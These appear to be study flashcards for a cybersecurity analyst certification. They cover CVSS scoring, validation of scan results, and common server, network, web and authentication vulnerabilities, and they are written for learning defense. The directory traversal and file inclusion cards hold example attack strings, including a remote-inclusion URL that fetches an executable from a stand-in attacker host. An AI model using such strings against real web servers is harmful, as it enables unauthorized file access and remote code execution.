Chapter 07: Analyzing Vulnerability Scans

Question 1

CVSS

Answer 1

Common Vulnerability Scoring System

Industry standard for assessing the severity of security vulnerabilities

It provdes a technique for scoring each vulnerability on a variety of measures, and analysts use CVSS to prioritize response actions

There are eight measures, with the first four evaluating the exploitability of the vulnerability:
* Attack Vector
* Attack Complexity
* Privileges Required
* User Interaction

The next three evaluate the impact of the vulnerability:
* Confidentiality
* Integrity
* Availability

The last discuses the scope of the vulnerability:
* Scope

Question 2

AV Metric

Answer 2

Attack Vector Metric

Describes how an attacker would exploit the vulnerability based on the following:
* Physical (P): The attacker must physically touch the vulnerable device—0.20
* Local (L): The attacker must have phyiscal or logical access to the affected system—0.55
* Adjacent Network (A): The attacker must have access to the local network that the affected system is connected to—0.62
* Network (N): The attacker can exploit the vulnerability remotely over a network—0.85

Question 3

AC Metric

Answer 3

Attack Complexity Metric

Describes the difficulty of exploiting the vulnerabilty based on the following:
* High (H): Exploiting the vulnerability requires specialized conditions that would be difficult to find—0.44
* Low (L): Exploiting the vulnerability doesn’t require any specialized conditions—0.77

Question 4

PR Metric

Answer 4

Privileges Required Metric

Describes the type of account access that an attacker would need to exploit the vulnerability based on:
* High (H): Attackers require administrative privileges to conduct the attack—0.27 (0.50 if Scope is changed)
* Low (L): Attackers require basic user privileges to conduct the attack—0.62 (0.68 if Scope is changed)
* None (N): Attackers don’t need to authenticate to exploit the vulnerability—0.85

Question 5

UI Metric

Answer 5

User Interaction Metric

Describes whether the attacker needs to involve another human in the attack based on:
* None (N): Successful exploitation doesn’t require action by any user other than the attacker—0.85
* Required (R): Successful exploitation requires action by a user other than the attacker—0.62

Question 6

C Metric

Answer 6

Confidentiality Metric

Describes the type of information disclosure that might occur if an attacker successfully exploits the vulnerability based on:
* None (N): There is no confidentiality impact—0.00
* Low (L): Access to some information is possible, but the attacker doesn’t have control over what’s compromised—0.22
* High (H): All information on the system is compromised—0.56

Question 7

I Metric

Answer 7

Integrity Metric

Describes the type of information alteration that might occur if an attacker successfully exploits the vulnerability based on:
* None (N): There is no integrity impact—0.00
* Low (L): Modification of some information is possible, but the attacker doesn’t have control over what information is modified—0.22
* High (H): The integrity of the system is totally compromised, and the attacker may change any information at will—0.56

Question 8

A Metric

Answer 8

Availability Metric

Describes the type of disruption that might occur if an attacker successfully exploits the vulnerability based on:
* None (N): There is no availability impact—0.00
* Low (L): The performance of the system is degraded—0.22
* High (H): The system is completely shut down—0.56

Question 9

S Metric

Answer 9

Scope Metric

Describes whether the vulnerability can affect system components beyond the scope of the vulnerability

NOTE: The scope metric table doesn’t contain score information. The value of the scope metric is reflected in the values for the PR metric
* Unchanged (U): The exploited vulnerability can only affect resources managed by the same security authority
* Changed (C): The exploited vulnerability can affect resources beyond the scope of the security authority managing the component containing the vulnerability

Question 10

CVSS Vector

Answer 10

Common Vulnerability Scoring System Vector

A single line format that conveys the ratings of a vulnerability on all eight metrics

Example
CVSS:3.1 / AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N

This vector contains nine components:
1. CVSS:3.1 = Informs the user that the vector was composed using CVSS version 3.1
2. Attack Vector: Network (0.85)
3. Attack Complexity: Low (0.77)
4. Privileges Required: None (0.85)
5. User Interaction: None (0.85
6. Scope: Unchanged
7. Confidentiality: High (0.56)
8. Integirty: None (0.00)
9. Availability: None (0.00)

Question 11

Calculating CVSS Base Score

Answer 11

Not necessary to do the math manually, but page 254 + 255 has a detailed write up if you ever want to study it more

Question 12

CVSS Qualitative Severity Rating Scale

Answer 12

• None: 0.0
• Low: 0.1 to 3.9
• Medium: 4.0 to 6.9
• High: 7.0 to 8.9
• Critical: 9.0 to 10.0

Question 13

True and False Scan Reports

Answer 13

When a scanner reports a vulnerability that doesn’t exist, it’s known as a false positive

When a vulnerability scanner reports a vulnerability, it’s known as a positive report, which can be either:
* Accurate: true positive report
* Inaccurate: false positive report

When a scanner reports that a vulnerability isn’t present, it’s known as a negative report, which can be either:
* Accurate: true negative report
* Inaccurate: false negative report

Always confirm each vulnerability reported by the scanner, which can be as simple as verifying that a patch is missing or an OS is outdated

It could also be complex
* EX: If you have an SQL injection vulnerability, you might need to attack the web app to see if it’s really there

Draw on your own expertise as well as subject matter experts from around your org like database admins, system engineers, network techs, devs, etc

To Validate Results
Reconcile results
* Results should be reconciled as scanners can misinterpret the information they receive from their probes

Correlate results with other sources
* Correlate the scan results with other data sources by reviewing related system and network logs

Compare to best practices
* Compare results to best practices to determine if they’re a high priority or a low risk

Identify exceptions
* Identify exceptions for findings whose risk has been accepted or transferred

Question 14

Documented Exceptions

Answer 14

Sometimes orgs might not remediate a vulnerability

Take action to record these exceptions because the vulnerability scanners will continue to report them each time a scan runs

If you document them, the scanner can ignore them in future reports and reduce the noise in scan reports, which increases their overall usefulness

NOTE: Always be aware of what compliance requirements you’re beholden to, so you don’t run afoul of violations

Question 15

Reconciling Scan Results With Other Data Sources

Answer 15

Vulnerability scans should never take place in a vacuum, which means you should always turn to other sources of security information as you perform analysis:
* Logs: Server, app, network devices etc, might contain information about possible attempts to exploit detected vulnerabilities
* SIEM: These correlate logs entries from multiple sources and provide actionable intelligence
* Configuration Management Systems: These provide information on the OS and apps installed on the system

Question 16

Trend Analysis

Answer 16

The process of detecting patterns within a data set over time, and using those patterns to make predictions about future events or to better understand past events

Managers should watch for overall trends in vulnerabilities, including the:
* Number of new vulnerabilities arising over time
* Age of the existing vulnerabilities
* Time required to remediate vulnerabilities

Question 17

Context Awareness

Answer 17

Always consider the context of a vulnerability

EX: A vulnerability on a system directly connected to the internet would be much more severe than one found on an internal system, or a system on an isolated network

Similarly, the asset value of the affected systems should also play a role in prioritizing remediation efforts—higher value assets present more risk to the org and should be higher on the remediation priority list

Question 18

Zero Day Attacks

Answer 18

Sophisticated attackers will often conduct their own security vulnerability research in an attempt to discover vunlerabilities that are unknown to other attackers or cybersecurity teams

After they uncover it, they don’t disclose it but choose to store it in a vulnerability repository for later use

When they exploit, it’s known as a zero day attack

Zero day are dangerous because they’re unknown to product vendors and there aren’t patches to correct them

APT actors who exploit zero day vulnerabilities can often easily compromise their targets

Question 19

Server and Endpoint Vulnerabilities

Answer 19

The OS running on both servers and endpoints have millions of lines of code, and the combinations of apps they run make each system fairly unique

Thus, many vulnerabilities detected by scans exist on server and endpoint systems, and they’re often the most complex to remediate

Page 261

Question 20

Missing Patches

Answer 20

Applying security patches to systems should be one of the core practices of any infosec program

This is sometimes neglected due to lack of resources for preventative maintenance

One of the most common alerts from a vulnerability scan is that one or more systems on the network are running an outdated version of an OS or app, and they require security patches

Question 21

Mobile Device Security

Answer 21

Mobile devices have a host of security issues of their own and must be carefully managed and patched to remain secure

This is often done through MDM solutions that manage configurations fo the devices, automatically install patches, require the use of encryption, and provide remove wiping

MDM can also restrict the apps that run on a mobile device with an approved list

Typically, mobile devices aren’t going to show up on a vulnerability scan because they’re not often sitting on the network when the scan runs

Admins should always pay careful attention to the security of mobile devices, even if they’re not showing up as devices that require attention after a scan

Question 22

End of Life or Outdated Components

Answer 22

Eventually, software vendors will discontinue support for every product they make

Once they announce the final end of support, ors that continue running the outdated software put themselves at significant risk of attack

The vendor will not investigate or correct security flaws that arise in outdated products

Always stay up to date on product and service lifecycle information to help plan and mitigate upcoming product EOL circumstances

In cases where an org has to keep using an unsupported OS, you should:
* Isolate the system as much as possible, preferably not connected to the network
* Apply as many compensating controls as possible like increased monitoring and strict firewall rules

Question 23

Buffer Overflows

Answer 23

Buffer overflow attacks occur when an attacker manipulates a program into placing more data into an area of memory than is allocated for that program’s use

The goal is to overwrite other information in memory with instructions that may be executed by a different process running on the system

These are very common and persist for many years after they’re initially discovered

Buffer overflows target two different types of memory:
* Stack overflows: Targets the stack, which stores variable values and is managed by the OS
* Heap overflows: Targets the heap, which stores objects created by code and must be managed by app devs
* Integer overflows: A variation of buffer overflow where the result of an arithmetic operation attempts to store an integer that is too large to fit into the specified buffer

Dion’s Notes
Heap Overflow
* A software vulnerability where input is allowed to overwrite memory locations within the area of a process’ memory allocation used to store dynamically-sized variables
* A heap overflow can overwrite those variables and possibly allow arbitrary code execution

Integer Overflow
* Attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow

Overflow Defense
* Choose the right programming language, C and C++ use strcpy and doesn’t perform boundary checking of the buffers—these two languages are very vulnerable to buffer overflows
* Java, Python, and PHP can detect overflow conditions and halt program execution
* Proper input validation and boundary checking on code
* Run programs with least privilege, user accounts vs kernel accounts
* ASLR (Address Space Layout Randomization): Technique that randomizes where components in a running application are placed in memory to protect against buffer overflows

Question 24

Privilege Escalation

Answer 24

Privilege escalation attacks seek to increase the level of access an attacker has to a target system

They exploit vulnerabilities that allow the transformation of a normal user account into a more privileged one

Rootkits are hacking tools designed to automate privilege escalation attacks—an attacker who gains access to a normal user account can use a rootkit to exploit a vulnerability and perform a privilege escalation attack to get root

Question 25

Code Execution

Answer 25

Code execution vulnerabilities allow an attacker to run software of their choice on the targeted system

This can be catastrophic, particularly if the vulnerability allows the attacker to run the code with admin privileges

Arbitrary Code Execution
* Vulnerability that allows an attacker to run a code or a module that exploits a vulnerability
* They can run what they want on your system without you stopping them
* If the attacker can physically touch your system and load software, that’s arbitrary—over the internet is RCE

RCE
* Vulnerability that allows an attacker to transmit code from a remote host for execution on a target host or a module that exploits such a vulnerability
* Attackers can exploit the vulnerability over a network connection without physical or logical access to the target system

Question 26

Insecure Design

Answer 26

Many of the older protocols used on networks in the early days of the internet were designed without security in mind

They failed to use encryption to protect usernames, passwords, and content sent over an open network—this exposed users to eavesdropping attacks

Telnet (23) and FTP (21) are two examples

The solution is to switch to a more secure protocol

Question 27

Security Misconfiguration

Answer 27

Systems can be configured in a way that allows attackers to gain information about the system’s security settings, or even to allow them to exploit a misconfigured system

For example, debug modes give devs crucial information they need to troubleshoot apps

However, debug modes can also inadvertantly assist attackers by providing detailed information about the inner workings of an app and server, as well as supporting databases

Vulnerability scans will alert to the presence of debug mode on scanned servers

Question 28

Network Vulnerabilities

Answer 28

Modern interconnected networks use a complex combination of infrastructure components and network appliances to provide widespread access to secure communications capabilities

These networks and their component parts are susceptible to security vulnerabilities that will show up on scans

Page 269

Question 29

Missing Firmware Updates

Answer 29

OS and apps aren’t the only devices that require regular security updates

Vulnerability scans can also detect security problems in network devices that require firmware updates form the manufacturer to correct

These vulnerabilities result in reports similar to the OS missing patch report and typically direct admins to the location of the vendor’s site where the firmware update is available

Question 30

Outdated SSL/TLS Versions

Answer 30

SSL isn’t secure and shouldn’t be used on production systems, and the same is true for early TLS versions

Vulnerability scanners may report that web servers are using these protocols, which means any connection using outdated versions is subject to eavesdropping attacks

Disable support for the outdated protocols and support only newer versions

Question 31

Insecure Cipher Use

Answer 31

SSL and TLS are not themselves cryptographic ciphers

Admins can designate the cryptographic ciphers that can be used with the protocols on a server-by-server basis

When a client and server want to communicate using SSL/TLS, they exchagne a list of ciphers that each system supports and agree on a mutually acceptable one

Some ciphers contain vulnerabilities that render them insecure because of their susceptibility to eavesdropping attacks

To solve, you have to alter the set of supported ciphers on the affected server and ensure only secure ciphers are used

Question 32

Certificate Problems

Answer 32

SSL and TLS rely on digital certs to validate the identify of servers and exchange cryptographic keys

Vulnerability scans can detect issues with the certificates presented by servers that support SSL and/or TLS

Common errors include:
* Mismatch Between the Name on the Certificate and the Name of the Server: Serious error that may indicate the use of a certificate taken from another site—it’s the digital equivalent of someone using a fake ID borrowed from a friend
* Expiration of the Digital Certificate: When you see an expired certificate, it most likely means that the server admin failed to renew it in a timely manner
* Unknown CA: Anyone can create a digital certificate, but they’re only useful if the recipient of a certificate trusts the entity that issued it—OS and browsers contain instructions to trust well-known CAs but will show errors if they encounter certificates issued by an unknown or untrusted CA

Question 33

Internal IP Disclosure

Answer 33

IPs come in two variants: public and private

Any server that’s accessible over the internet must have a public IP that allows access, but that address is often managed by a firewall that uses NAT to map the public IP to the server’s true private IP

Systems on the local network can use the server’s private IP for direct access, but remote systems should never be aware of that IP

Servers that aren’t properly configured may leak their private IP to remote systems

This can occur when the system includes its own IP in the header information returned to an HTTP request

The server isn’t aware that NAT is in use, so it uses a private address in its response

Attackers can use this information to learn more about the internal configuration of a firewalled network

Question 34

Critical Infrastructure and Operational Technology

Answer 34

Analysts might come across the use of these systems:
* SCADA (Supervisory Control and Data Acquisition)
* ICS (Industrial Control Systems)
* IoT (Internet of Thins)
* OT (operational technology)

These systems allow the connection of physical devices and processes to networks and provide tremendous sources of data for orgs

They each have major security concerns as well

Four Key Controls for Mitigating Vulnerabilities in Specialized Systems
1. Establish administrative control over operational technology networks by recruiting staff with relevant expertise
2. Implement the minimum network links by disabling unnecessary links, servicse, and protocols
3. Develop and test a patch management program for OT networks
4. Perform regular audits of logical and physical access to systems to detect possible vulnerabilities and intrusions

Page 275

Question 35

Web App Vulnerabilities

Answer 35

Web apps are complex environments that often rely on web servers, backend databases, authentication servers, and other components to provide services to end users

They may also contain security holes that allow attackers to gain a foothold on a network, and vulnerability scanners acn problem them for vulnerabilities

Page 276

Question 36

Injection Flaws

Answer 36

Injection flaws occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing the request came from the web server

The most common form of this attack is SQL injection, which exploits web apps to send unauthorized commands to a backend database server

An injection attack is the insertion of additional information or code through data input from a client to an application

Defense is to use input validation and enforce least privilege restrictions on database access

Aside from SQL injection, analysts should be aware of attacks that seek to introduce user-supplied, malicious content into XML docs and LDAP queries

Dion’s Notes
SQL Injection
* SQL commands: select, insert, delete, update
* Attack consisting of the insertion or injection of an SQL query via input data from the client to a web app
* An attacker must test every single input to include elements to identify an SQL injection vulnerability
* EXAM: If you see something with ‘ or ‘’ it is almost always SQL injection
* EXAM: X = X where X = any number (1=1, 5=5, etc), it’s SQL injection

XML
* On the exam, could be referred to as XML vulnerabilities, exploitation, or injection
* XML data submitted without encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary code
* XML Bomb (Billion Laughs Attack): XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it
* XML External Entity (XXE): An attack that embeds a request for a local resource
* To prevent XML vulnerabilities, use input validation
* EXAM: If you see XML, it’s XML vulnerability being exploited
* EXAM: XML can look a lot like HTML, but HTML has predefined things like font, image, or ahref—take time to read the code and see
* EXAM: XML uses things like question, ID, type, element, or entity

Question 37

XSS

Answer 37

Cross site scripting is when an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site

The idea is to trick a user into visiting a trusted site into executing malicious code placed by an untrusted third party

XSS comes in two flavors:
* Persistent XSS: When the attacker is able to actually store the attack code on a server, which remains there waiting for a user to request the affected content—also known as stored XSS
* Reflected XSS: When the attacker tricks a user into sending the attack to the server as part of a query string or other content—the server then sends the attack back to the user (reflecting it) and causing the code to execute

Dion’s Notes
* A malicious script hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser’s security model of trusted zones
* We’re trying to get you to click or run something your system doesn’t want you to
* NOTE: XSS is a powerful input validation exploit—you need to do input validation to protect yourself from XSS
* XSS breaks the browser’s security model since browsers assume that scripting is safe
* DOM (Document Object Model) XSS: An attack that exploits the client’s web browser using the client-side scripts to modify the content and layout of a web page—DOM XSS attacks run with the logged in user’s privileges of the local system
* EXAM: If you see something with “script” in it, usually XSS
* EXAM: If you see something with “javascript” as part of the URL captured within a log, likely XSS
* EXAM: If you see “script alert document . something” it’s DOM XSS

Question 38

Directory Traversal

Answer 38

When the attacker inserts filesystem path values into a query string, seeking to navigate to a file located in an area not normally authorized for public access

WEBSITE/policy?document=’../../payroll/mike.pdf

Software devs and security pros should implement three types of controls to protect against directory traversal:
1. App designs should avoid including filenames in user-manipulatable fields like query strings
2. Input validation should prevent the use of special characters required to perform directory traversal
3. Access controls on storage servers should restrict the web server’s access to files authorized for public access

• EXAM: Any time you see something with “../” it’s directory traversal
• EXAM: “../” could also be file inclusion, but the test won’t give you choices that include both—it will be either or

Question 39

File Inclusion

Answer 39

File inclusion attacks take directory traversal to the next level

Instead of simply retreiving a file from the local OS and displaying it to the attacker, file inclusion actually executes the code contained within the file, allowing an attacker to fool the webserver into executing arbitrary code

They come in two flavors:
* LFI: Seeks to execute code stored in a file located elsewhere on the webserver and works similarly to a directory traversal attack
* EX: website/app.php?include=C:\www\uploads\attack.exe
* RFI: Allows attacker to execute code stored on a remote server, and is especially dangerous because the attacker can directly control the code being executed without first having to store a file on the local server
* EX: website/app/php?include=http://evil.attacker.com/attack.exe

Most often, when attackers discover file inclusion vulnerabilities they will exploit them to upload a web shell to the server

The web shell allows them to execute commands directly on the server and view the results in their browser—access to the server over HTTP/S like this makes traffic less vulnerable to detection by security tools

Dion’s Notes
* A web app vulnerability that allows an attacker to either download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor
* RFI: An attacker executes a script to inject a remote file into the web app or website
* LFI: An attacker adds a file to the web app or website that already exists on the hosting server

Question 40

Request Forgery

Answer 40

Request forgery attacks exploit trust relationships and attempt to have users unwittingly execute commands against a remote server

They come in two flavors:
* CSRF
* SSRF

Question 41

CSRF

Answer 41

Cross Site Request Forgery

XSS exploits the trust that a user has in a website to execute code on the user’s computer, but CSRF exploits the trust that remote sites have in a user’s system to execute commands on the user’s behalf

CSRF details:
* Operates on the assumption that users are often logged into many different sites at the same time
* Attackers can then embed code in one site that sends a command to a second site
* When user clicks the link on the first site, they’re unknowingly sending a command to the second site
* If user is logged into second site, the command may succeed

Devs can protect web apps from CSRF by:
* Creating web apps that use secure tokens that the attacker wouldn’t know to embed in links
* Have sites check referring URL in requests received from end users and only accept requests originating from their own site

Dion’s Notes
* A malicous script hosted on the attacker’s site that can exploit a session started on another site in the same browser
* Attackers must convince victims to start a session with the target website
* Attacker passes HTTP request to victim’s browser and spoof this as an action on the target site, such as changing a password
* Can be disguised with image tags, HTML coding, or many other tactics
* Victim doesn’t always need to click a link
* If the target site assumes the browser is authenticated, that’s because they have a valid session token from that browser already from that victim, it doesn’t need additonal authorization

Defense
* Request user-specific tokens in all form submissions

Question 42

SSRF

Answer 42

Server Side Request Forgery

Similar to CSRF, but instead of tricking a user’s browser into visiting a URL, they trick a server into visiting a URL based upon user-supplied input

SSRF attacks are possible when a web app accepts URLs from users as input and then retrieves information from that URL

If the server has access to non-public URLs, an SSRF can unintentionally disclose that information to an attacker

Dion’s Notes
* An attack in which an attacker is able to send a request on behalf of a web app
* Includes internal systems like databases or services that aren’t exposed to the public internet, like a local host
* To prevent SSRF, use proper input validation, authentication, and access controls in all of your apps
* You can also use WAFs to detect and block SSRF attacks

Question 43

Identification and Authentication Failures

Answer 43

There are a few common methods of targeting IAM systems as well as the use of identity information, each with common protection methods to remediate

Many have access to broken control systems at their core—poorly designed or improperly implemented access control systems expose orgs to a variety of attacks

They include:
* Password spraying
* Credential stuffing
* Impersonation
* MITM
* Session hijacking

Spoofing
* A software-based attack where the goal is to assume the identity of a user, process, address, or other unique identifier

Broken Authentication
* A software vulnerability where the authentication mechanism allows an attacker to gain entry
* This is caused by weak password credentials, weak password reset methods, credential exposure, session hijacking

Page 281

Question 44

Password Reuse

Answer 44

Two common authentication vulnerabilities arise because of the propensity of users to reuse the same passwords across multiple sites:
* Password Spraying Attacks: When an attacker uses a list of common passwords and attempts to log into many different user accounts with those common passwords—they only need to find one valid user/pass combo to gain access
* Credential Stuffing Attacks: When an attacker takes a list of user/pass that were stolen in the copromise of one site and uses them to attempt to gain access to a different, potentially unrelated site

Both of these attacks are successful when:
* Spraying: Users don’t choose sufficiently unique passwords
* Stuffing: Users reuse the same passwords across many different sites

To help remediate:
* Use strong password management practices
* Require the use of MFA on sensitive systems

Question 45

Impersonation

Answer 45

Impersonation attacks occur when an attacker takes on the identity of a legitimate user

Security issues like OAuth open redirects can allow impersonation to occur

Preventing impersonation may require stronger session handling techniques like those found on OWASP’s session management cheat sheet

Other types of impersonation can be prevented by securing session identifiers that attackers might otherwise acquire, either on the local workstation or over the network

https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html

Question 46

MITM

Answer 46

On path and man in the middle attacks occur when an attacker is able to intefere with the comms flow between two systems

End-to-end encryption of sessions or network links can help reduce the change of a successful MITM attack, unless attackers control endpoints or have the encryption keys

MITB
* An attack that intercepts API calls between the browser processes and its DLLs

Question 47

Session Hijacking

Answer 47

Focuses on taking over an already existing session, either by acquiring the sesion key or cookies used by the remote server to validate the session

Or by causing the session to pass through a system the attacker controls, allowing them to participate in the session

Much like impersonation and MITM, securing the data that an attacker needs to acquire in order to hijack the session

Encrypt network sessions, links, and on local system to limit the opporunities for session hijacking

Session Management
* Enables web apps to uniquely identify a user across a number of different actions and requests, while keeping the state of the data generated by the user and ensuring it’s assigned to that user
* Session cookies are non-persistent, reside in memory, and are deleted when the browser instance is closed
* Persistent cookies are stored in a file or your database and aren’t deleted until you do so manually

Session hijacking attacks can occur through the theft or modification of cookies

Session Prediction Attack
* A type of spoofing attack where the attacker attempts to predict the session token to hijack a session
* A session token must be generated using a non-predictable algorithm and it must not reveal any information about the session client

Cookie Poisoning
* Modifies the contents of a cookie after it’s been generated and sent by the web service to the client’s browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app
* Do input validation, encrypt cookies, delete cookies from browser cache when user terminates session

Question 48

Data Poisoning

Answer 48

Attacks that try to manipulate training datasets in a way that causes ML algorithms to create inaccurate models

AKA fake telemetry